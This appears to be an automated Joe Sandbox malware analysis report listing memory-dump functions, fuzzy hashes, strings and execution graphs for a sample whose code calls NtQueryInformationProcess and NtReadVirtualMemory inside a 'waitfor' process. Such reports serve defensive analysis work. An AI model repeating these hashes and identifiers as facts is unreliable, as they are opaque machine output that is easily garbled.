                                                                                                                                                                                • Instruction ID: 6514e77b85bec2387cbd5c99ff2cc911722740417e57b8462d02e258f827f0c5
                                                                                                                                                                                • Opcode Fuzzy Hash: a5f221b3a47ade4444efe218b65e602e41805c31721a5cdf68adfef1846943e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E310275E00218DFDB05EFA8E884A9DBBF5EB48721F10816AE911F7380CB759941CF50
                                                                                                                                                                                Function 3332F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                                                • Opcode ID: 6d884e0844970dfa5bb83283d0b8f7d6996b08153aaa709bcde4c29688403238
                                                                                                                                                                                • Instruction ID: 6a6bf58542d598354cb21469d17aae4b57a97e47126a4558e4760ec868550797
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d884e0844970dfa5bb83283d0b8f7d6996b08153aaa709bcde4c29688403238
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C913571B45740AFE315DF25C880B2ABBE9FF84B40F04C659E885DBA91DB34E845CB92
                                                                                                                                                                                Function 33350AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 33399F1C
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33399F2E
                                                                                                                                                                                • LdrpCheckModule, xrefs: 33399F24
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-161242083
                                                                                                                                                                                • Opcode ID: a6150a4e20df56615880ff3dac5786d1e09d6da9bbf341475daa7a4641e24006
                                                                                                                                                                                • Instruction ID: a021c078f9c88bca6313010ee2a7b771a53b5c0663213663b5eb7ab6866d4547
                                                                                                                                                                                • Opcode Fuzzy Hash: a6150a4e20df56615880ff3dac5786d1e09d6da9bbf341475daa7a4641e24006
                                                                                                                                                                                • Instruction Fuzzy Hash: BE719C75E00205DFEB04DF68C890FAEB7F8EB44608F18C469E846F7651E779A942CB50
                                                                                                                                                                                Function 3335EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a4230b12d78f8940f5814a2e09ba239290564a0edf52b26cd32b6758808f14ee
                                                                                                                                                                                • Instruction ID: 5090123d16baf96837337542a094aff817fa6fcb087e813a5c94e8286c735635
                                                                                                                                                                                • Opcode Fuzzy Hash: a4230b12d78f8940f5814a2e09ba239290564a0edf52b26cd32b6758808f14ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 4EE1F175D40708CFEB25CFA9D980A9DBBF9FF48340F18862AE485A7664DB74A941CF10
                                                                                                                                                                                Function 3340A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 5b9c839087df7209e5cab6da5e2cf65215d582ebca8cf02bd9974f9211fcdd9c
                                                                                                                                                                                • Instruction ID: c27d26598bb020f18f4a3bc79c5f4f2007e2ff9d9cf1b4c21f7891434ddbf6cc
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9c839087df7209e5cab6da5e2cf65215d582ebca8cf02bd9974f9211fcdd9c
                                                                                                                                                                                • Instruction Fuzzy Hash: EA5188787146169FEB08CF18C9A0A29B3E6BB89350B18417DD956DB720DB71EC4ACF84
                                                                                                                                                                                Function 333AEBC0 Relevance: 6.2, APIs: 4, Instructions: 158timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 42833c20d9b5366fc9625f2a9a686f6aca7d729b214e1cf2f074180b5e8a39f5
                                                                                                                                                                                • Instruction ID: ff5efa35b7f7032d4ec36cb95b36cae87c718e0aab1a07f3cebbda432567450b
                                                                                                                                                                                • Opcode Fuzzy Hash: 42833c20d9b5366fc9625f2a9a686f6aca7d729b214e1cf2f074180b5e8a39f5
                                                                                                                                                                                • Instruction Fuzzy Hash: CB5122B6E022199FEB04CF99C844ADDBBF6FF48355F05812AE805BB260DB349905CF54
                                                                                                                                                                                Function 333358E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                • Opcode ID: 3e93102211053215340c73f2eaba5505e76575c854fa1277cf71fc8e67f57d6a
                                                                                                                                                                                • Instruction ID: e42eb536fc7d0062a11a8780673316eff88f63cc1d513a683754956c1344eb08
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e93102211053215340c73f2eaba5505e76575c854fa1277cf71fc8e67f57d6a
                                                                                                                                                                                • Instruction Fuzzy Hash: D3324474D46329CFEB22CF64C884BD9BBB4AF0A324F04C1E9D449A7651DB749A84CF91
                                                                                                                                                                                Function 333D8B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: ${=3
                                                                                                                                                                                • API String ID: 0-2155003802
                                                                                                                                                                                • Opcode ID: 86e50b6df68612b733f1c2601b7dcb64b15407ceeb6af8133a9b429a8a8792fc
                                                                                                                                                                                • Instruction ID: 3d66d159d3c1d283ecf9bd218adbca3eb6160096e1b88e7a00b8fd83145ed9d7
                                                                                                                                                                                • Opcode Fuzzy Hash: 86e50b6df68612b733f1c2601b7dcb64b15407ceeb6af8133a9b429a8a8792fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 88B19E76A093019FD710CF28D880A1BB7E9EF84755F548A6EF994DF2A0D730E944CB52
                                                                                                                                                                                Function 33364B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                • Opcode ID: 1803510534785ce613833a7ed85386d35ddee87756269c7dd7aa443e8243b42d
                                                                                                                                                                                • Instruction ID: a316e5823d2df4d56b9514a3278da3b9ccc53ddc490658519732b03b1bfcbbd1
                                                                                                                                                                                • Opcode Fuzzy Hash: 1803510534785ce613833a7ed85386d35ddee87756269c7dd7aa443e8243b42d
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E519DB5E006089FEB14DF98C9C4759FBF8EF44758F18C02AD445AB294EB709985CB80
                                                                                                                                                                                Function 33330485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33330586
                                                                                                                                                                                • kLsE, xrefs: 333305FE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                • Opcode ID: 60797c972373d39c0b47d10b44a5e8e9ce75780f8f6cc88477b22309a1de406f
                                                                                                                                                                                • Instruction ID: 4702c2f75a3590ac6d356884a1e6c7c1a3c1b792816b6cd7074363a90835b7c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 60797c972373d39c0b47d10b44a5e8e9ce75780f8f6cc88477b22309a1de406f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7751DEB5A46746DFE714DFA4C8806EAB7E8AF06310F00C43ED5D6D7610EB789509CB62
                                                                                                                                                                                Function 3332E67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: ^23
                                                                                                                                                                                • API String ID: 3446177414-4160069314
                                                                                                                                                                                • Opcode ID: 04a3ddfdef3c658d37caf4f81541e4b51acd0f62f06aafa0feb07173901da04f
                                                                                                                                                                                • Instruction ID: 2e30367fff35b91ebfce766ca191d3b55da947b8d14dbcc8c4739a9c5346000a
                                                                                                                                                                                • Opcode Fuzzy Hash: 04a3ddfdef3c658d37caf4f81541e4b51acd0f62f06aafa0feb07173901da04f
                                                                                                                                                                                • Instruction Fuzzy Hash: DC417CB9A01211DFDB15CF29C8856657BE9FF99750B14C06AEC48DB360DB30E891CBA0
                                                                                                                                                                                Function 3332DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                • Opcode ID: 2fac79e15da4894a5f24ff32a9289fb0c105dc86407cdfd6af14b2c4f0d19de0
                                                                                                                                                                                • Instruction ID: 804d9424b7bb3771d1cf24aa69e960cdc8dd16a4ce929aae6306e6f597dc7619
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fac79e15da4894a5f24ff32a9289fb0c105dc86407cdfd6af14b2c4f0d19de0
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B417FB1A08741AFD300CF28D894A5ABBE4FF88354F04866EF488DB300D771E905CB86
                                                                                                                                                                                Function 333CAA40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 333CAABF
                                                                                                                                                                                • ^Qc, xrefs: 333CAAD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p$^Qc
                                                                                                                                                                                • API String ID: 3446177414-881798178
                                                                                                                                                                                • Opcode ID: 76ff0747703967f1033378249bf18e1c9e98af059b8d10ea1e743c5e8a55ff7a
                                                                                                                                                                                • Instruction ID: 330f4769b2659427827c49435c683f3b2c90ca3939c0082c0fc3366ed3e05c97
                                                                                                                                                                                • Opcode Fuzzy Hash: 76ff0747703967f1033378249bf18e1c9e98af059b8d10ea1e743c5e8a55ff7a
                                                                                                                                                                                • Instruction Fuzzy Hash: BE31CDB6E40688AFD701DF54CD40F9ABBF9EB84B10F14C269E905B7A80D778AC01CB90
                                                                                                                                                                                Function 3332E880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: 23$m23
                                                                                                                                                                                • API String ID: 3446177414-3319721989
                                                                                                                                                                                • Opcode ID: 1365728acb51ea3ff31590e52d7420657e29730d936bee70526445b72684dada
                                                                                                                                                                                • Instruction ID: b59f083214512ecae2d5948652388db5aff3657b2e18dbde025b7b8daee582c9
                                                                                                                                                                                • Opcode Fuzzy Hash: 1365728acb51ea3ff31590e52d7420657e29730d936bee70526445b72684dada
                                                                                                                                                                                • Instruction Fuzzy Hash: FC11B3B5E01218AFDB11CF98D885ADEBBB5EF4C360F10411AF911B7240D735AA54CBA0

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:0.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:88.2%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:17
                                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                                execution_graph 73480 5202b20 73482 5202b2a 73480->73482 73483 5202b31 73482->73483 73484 5202b3f LdrInitializeThunk 73482->73484 73493 52029f0 LdrInitializeThunk 73499 5091e98 73500 5091ef0 73499->73500 73501 5091f24 73500->73501 73504 508f038 73500->73504 73503 5091f01 73505 508f05d 73504->73505 73506 508f1da NtQueryInformationProcess 73505->73506 73509 508f24d 73505->73509 73507 508f214 73506->73507 73508 508f2f2 NtReadVirtualMemory 73507->73508 73507->73509 73508->73509 73509->73503 73510 2fd9a67 NtClose 73511 2fd9a98 73510->73511

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 0508F038 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 541nativeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 508f038-508f05b 1 508f079-508f099 call 5091308 call 508d0a8 0->1 2 508f05d-508f074 call 50912e8 0->2 8 508f68a-508f695 1->8 9 508f09f-508f1ab call 508ef68 call 5091308 call 5095274 call 5080398 call 50908c8 call 5080398 call 50908c8 call 5092fd8 1->9 2->1 26 508f67e-508f685 call 508ef68 9->26 27 508f1b1-508f24b call 5080398 call 50908c8 NtQueryInformationProcess call 5091308 call 5080398 call 50908c8 9->27 26->8 39 508f24d-508f25a 27->39 40 508f25f-508f2db call 5095282 call 5080398 call 50908c8 27->40 39->26 40->39 49 508f2e1-508f2f0 call 50952ac 40->49 52 508f33d-508f383 call 5080398 call 50908c8 call 5093938 49->52 53 508f2f2-508f333 NtReadVirtualMemory call 5091ff8 49->53 62 508f3a2-508f49e call 5080398 call 50908c8 call 50952ba call 5080398 call 50908c8 call 50932f8 call 50912b8 * 3 call 50952ac 52->62 63 508f385-508f39d 52->63 56 508f338 53->56 56->26 86 508f4a0-508f4cf call 50952ac call 50912b8 call 509530e call 50952c8 62->86 87 508f4d1-508f4e6 call 50952ac 62->87 63->26 99 508f526-508f530 86->99 93 508f4e8-508f50a call 5092aa8 87->93 94 508f50f-508f521 call 5091f38 87->94 93->94 94->99 101 508f5f5-508f65e call 5080398 call 50908c8 call 5093c58 99->101 102 508f536-508f586 call 5080398 call 50908c8 call 5093618 call 50952ac 99->102 101->26 127 508f660-508f679 call 50912e8 101->127 120 508f588-508f5b1 call 5095358 call 509530e 102->120 121 508f5bb-508f5c3 call 50952ac 102->121 120->121 121->101 129 508f5c5-508f5d0 121->129 127->26 129->101 131 508f5d2-508f5f0 call 5093f78 129->131 131->101
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtQueryInformationProcess.NTDLL ref: 0508F1F9
                                                                                                                                                                                • NtReadVirtualMemory.NTDLL ref: 0508F30D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482449989.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5080000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                • String ID: 0$~,VH$OR+
                                                                                                                                                                                • API String ID: 1498878907-4020732180
                                                                                                                                                                                • Opcode ID: 5d4d39e875c25aa832bc67a7086d0fc650dbfabbd9594b02e507059220aecd91
                                                                                                                                                                                • Instruction ID: 6e3a18c0c2f9c403a1cc45a084b0505a6eb39c5ca10ff5d81f065f19074b8b35
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d4d39e875c25aa832bc67a7086d0fc650dbfabbd9594b02e507059220aecd91
                                                                                                                                                                                • Instruction Fuzzy Hash: 17024E70618A8D9FCFA9EF68D898AEE77E1FFA5300F40461E948AC7244DF349645CB41
                                                                                                                                                                                Function 02FD9A67 Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 134 2fd9a67-2fd9a90 NtClose 135 2fd9a98-2fd9aa5 134->135
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33480220140.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_2fb0000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                • Opcode ID: bd7927d976b0e10c3aa9637b3a0958410aa6209ded68882e1a7740e87cbd5ffc
                                                                                                                                                                                • Instruction ID: f28762be4a3fc94df92cac908299979113939c9dd15f0e56de96f959f6afbdcb
                                                                                                                                                                                • Opcode Fuzzy Hash: bd7927d976b0e10c3aa9637b3a0958410aa6209ded68882e1a7740e87cbd5ffc
                                                                                                                                                                                • Instruction Fuzzy Hash: CFE07D4689D3C384C7007BF4881434E7F61AE06634B0C8F9CC9F10A097C9051D86CB01
                                                                                                                                                                                Function 052034E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9e66318e05cc2821bd88d2a6b4af3e41465ad8d144210a42617fa70c26c803cc
                                                                                                                                                                                • Instruction ID: 22de708d928f169b4f33f90d8da54ea17aadbc4e52ef4e0a3427941ceb9da5df
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e66318e05cc2821bd88d2a6b4af3e41465ad8d144210a42617fa70c26c803cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A90023161510802D5006158469470720968BE0201FA2C815A4414568DCBE5895275A6
                                                                                                                                                                                Function 05202D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 152 5202d10-5202d1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_5190000_waitfor.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 77e461e785ccb4c61c272cee95d197236a7eef03399efa335800e6dba09b4234
                                                                                                                                                                                • Instruction ID: bc18e21400e72bb74933ab1d259370547d842dbae816c4d8050790f063d417da
                                                                                                                                                                                • Opcode Fuzzy Hash: 77e461e785ccb4c61c272cee95d197236a7eef03399efa335800e6dba09b4234
                                                                                                                                                                                • Instruction Fuzzy Hash: AF90023121100813D51161584684707109A8BE0241FD2C816A4414558DDAA68953B125
                                                                                                                                                                                Function 05202C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 150 5202c30-5202c3c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.33482540954.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
